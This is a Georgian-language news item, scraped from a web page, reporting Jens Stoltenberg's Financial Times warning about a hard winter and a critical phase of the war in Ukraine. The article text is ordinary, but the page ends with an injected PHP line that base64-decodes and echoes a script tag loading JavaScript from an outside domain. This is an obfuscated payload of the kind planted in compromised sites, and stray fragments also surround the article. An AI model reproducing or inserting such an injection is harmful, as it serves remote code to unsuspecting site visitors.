celsiusi
ავერსი შნაიდერი
იენს სტოლტენბერგის განცხადებით, უკრაინაში ომი კრიტიკულ ფაზაში შედის და მომავალი ზამთარი გამოცდა იქნება უკრაინის მხარდამჭერებისთვისაც.
 
მედიის ინფორმაციით, აღნიშნულის შესახებ ნატო-ს გენერალურმა მდივანმა „ფაინენშალ თაიმსში“ გამოქვეყნებულ სტატიაში დაწერა.
 
„უკრაინაში ომი კრიტიკულ ფაზაში შედის. ზამთარი მოდის და იქნება რთული. იქნება რთული უკრაინელი ხალხისთვის და შეიარაღებული ძალებისთვის, რომლებიც იბრძვიან მათი თავისუფლებისთვის და ჩვენთვის, ვინც მათ მხარს ვუჭერთ. ჩვენი ერთობა და სოლიდარობა სერიოზული გამოცდის ქვეშ დადგება, რადგან ოჯახები და ბიზნესი გრძნობენ რუსეთის სასტიკი შემოჭრით გამოწვეული ენერგეტიკის ფასების და ცხოვრების ხარჯების მკვეთრ ზრდას“, – წერს სტოლტენბერგი.
 
სტოლტენბერგმა აღნიშნა, რომ წინ შეიძლება იყოს რთული ექვსი თვე, ელექტროენერგიის გათიშვის, შეფერხებების და შესაძლოა სამოქალაქო არეულობის საშიშროებით.
 
„უკრაინის მომავლისა და ჩვენი მომავლისთვის, ჩვენ უნდა მოვემზადოთ ზამთრის ომისთვის, დავრჩეთ ჩვენს გზაზე და წინააღმდეგობა გავუწიოთ ტირანიას. თუ რუსეთი შეწყვეტს ბრძოლას, იქნება მშვიდობა. თუ უკრაინა შეწყვეტს ბრძოლას, ის შეწყვეტს არსებობას, როგორც დამოუკიდებელი სახელმწიფო. ჩვენ ვალდებულნი ვართ მხარი დავუჭიროთ ამ დამოუკიდებელ დემოკრატიას ევროპის ცენტრში“, – განაცხადა ნატოს გენერალურმა მდივანმა.
496
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");